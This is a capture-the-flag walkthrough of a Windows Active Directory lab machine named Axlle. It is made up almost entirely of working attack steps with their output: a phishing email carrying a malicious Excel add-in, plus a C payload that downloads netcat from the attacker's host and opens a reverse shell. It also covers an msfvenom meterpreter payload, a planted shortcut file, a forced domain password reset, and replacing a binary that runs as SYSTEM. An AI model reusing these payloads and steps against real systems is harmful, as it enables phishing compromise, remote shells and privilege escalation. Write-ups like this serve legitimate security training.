User.txt
First we need search for open ports in the machine
sudo nmap -sV -p- -Pn -vv -T4 10.129.78.149
Output:
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-22 20:04:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51187/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53143/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53144/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57950/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57965/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Let’s add axlle.htb to our /etc/hosts file
sudo echo "10.129.78.149 axlle.htb" | sudo tee -a /etc/hosts
In the website we can see this message:
Then we need craft a phishing mail with a malicious payload.
First, create the exploit.c file
#include <windows.h>
#include <stdlib.h>
__declspec(dllexport) short __stdcall xlAutoOpen()
{
system("curl http://10.10.14.27:8081/nc64.exe -o c:\\Windows\\Tasks\\nc64.exe && C:\\Windows\\Tasks\\nc64.exe -e cmd 10.10.14.27 1337");
return 0;
}
And create exploit.def
LIBRARY mydll
EXPORTS
xlAutoOpen
Then, compile
x86_64-w64-mingw32-gcc -shared -o exploit.dll exploit.c -Wl,--output-def=exploit.def
Set up your python3 webserver and send the email with swaks
swaks --to "accounts@axlle.htb" --from "lautaro@axlle.htb" --header "Subject: Exploit" --body "Exploit" --attach-type application/octet-stream --attach @exploit.xll --server axlle.htb --port 25 --timeout 20s
In your nc listener will get the shell
C:\Users\gideon.hamill\Desktop>whoami
whoami
axlle\gideon.hamill
C:\Users\gideon.hamill\Desktop>
We can see this mail:
C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Content:
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Then we will craft a rev.exe with msfvenom and set up a listener with the multi handler.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > rev.exe
Then with curl upload the shell
C:\ProgramData>curl http://10.10.14.27:8081/rev.exe -o C:\ProgramData\rev.exe
curl http://10.10.14.27:8081/rev.exe -o C:\ProgramData\rev.exe
And now we need create a shorcut
powershell.exe
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
$lnk.TargetPath = "c:\programdata\rev.exe"
$lnk.Save()
PS C:\ProgramData> $objShell = New-Object -ComObject WScript.Shell
$objShell = New-Object -ComObject WScript.Shell
PS C:\ProgramData> $lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
PS C:\ProgramData> $lnk.TargetPath = "c:\programdata\rev.exe"
$lnk.TargetPath = "c:\programdata\rev.exe"
PS C:\ProgramData> $lnk.Save()
$lnk.Save()
PS C:\ProgramData>
Then we’ll receive a new meterpreter session
And get the flag
C:\Users\dallon.matrix\Desktop>type user.txt
type user.txt
2745afe***********7185b14d93
C:\Users\dallon.matrix\Desktop>
Root.txt
With BloodHound we can know that we can change the jacob user password.
Let’s import PowerView.ps1 to the windows machine
curl http://10.10.14.27:8081/PowerView.ps1 -o C:\Users\dallon.matrix\Desktop\PowerView.ps1
And then
Import-Module .\PowerView.ps1
Then
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
And we can now log in via evil-winrm as jacob
evil-winrm -u jacob.greeny -p 'Password123!' -i axlle.htb
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> whoami
axlle\jacob.greeny
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Look the README.md file in
C:\App Development\kbfiltr> type README.md
Look at
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Then we just need overwrite the standalonerunner.exe file with our latest rev.exe that we upload some minutes ago.
Then go to
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\internal\x64
And upload the rev.exe with iwr
iwr -uri http://10.10.14.27:8081/rev.exe -o standalonerunner.exe
We previously need exit from our meterpreter session and run exploit again
Then
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5557d5************ae2070f2
C:\Users\Administrator\Desktop>
Get the last flag.
I hope you found it useful (:
Leave a Reply